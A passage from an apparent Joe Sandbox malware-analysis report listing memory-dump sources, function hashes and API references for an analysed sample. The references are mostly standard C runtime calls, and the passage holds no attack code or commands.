• Instruction Fuzzy Hash: 09A012306011008B63104F305D8460C3A94594459034500386004C0020DE304094D708
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction ID: 391d770a71b87e044a5fda50daec76cc4896d9791836348fdfd4423cdff5bec7
• Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction Fuzzy Hash: 41118272344100DFE744DF65DC84EAA73EAEB89324B198059ED08DB312E675F841C760
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction ID: c43ecb694a6987b685b370c6bc105688744cf5c35a50e9af01831c872ca9259b
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: 5101A776A016089FDF21DF24C809FBAB3F5FB85215F4544F9D90A97242F774B9418BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
• Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0041F695
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
• _free.LIBCMT ref: 0041F68A
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041F6AC
• _free.LIBCMT ref: 0041F6C1
• _free.LIBCMT ref: 0041F6CC
• _free.LIBCMT ref: 0041F6EE
• _free.LIBCMT ref: 0041F701
• _free.LIBCMT ref: 0041F70F
• _free.LIBCMT ref: 0041F71A
• _free.LIBCMT ref: 0041F752
• _free.LIBCMT ref: 0041F759
• _free.LIBCMT ref: 0041F776
• _free.LIBCMT ref: 0041F78E
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
• Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
• Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
Uniqueness

Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                  • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
• __alloca_probe_16.LIBCMT ref: 004167D1
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
• __alloca_probe_16.LIBCMT ref: 004168B6
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
• __freea.LIBCMT ref: 00416926
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
• __freea.LIBCMT ref: 0041692F
• __freea.LIBCMT ref: 00416954
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
• Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
• Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
• Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
• Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
• Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
• Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
• Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
• __fassign.LIBCMT ref: 00415AD0
• __fassign.LIBCMT ref: 00415AEB
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
• WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
• WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
• Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
• Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
• Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 0040C7DB
• ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
• _ValidateLocalCookies.LIBCMT ref: 0040C871
• __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
• _ValidateLocalCookies.LIBCMT ref: 0040C8F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
• Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
• Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
• Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
• Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
• _free.LIBCMT ref: 0041F42A
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041F435
• _free.LIBCMT ref: 0041F440
• _free.LIBCMT ref: 0041F494
• _free.LIBCMT ref: 0041F49F
• _free.LIBCMT ref: 0041F4AA
• _free.LIBCMT ref: 0041F4B5
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
• Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
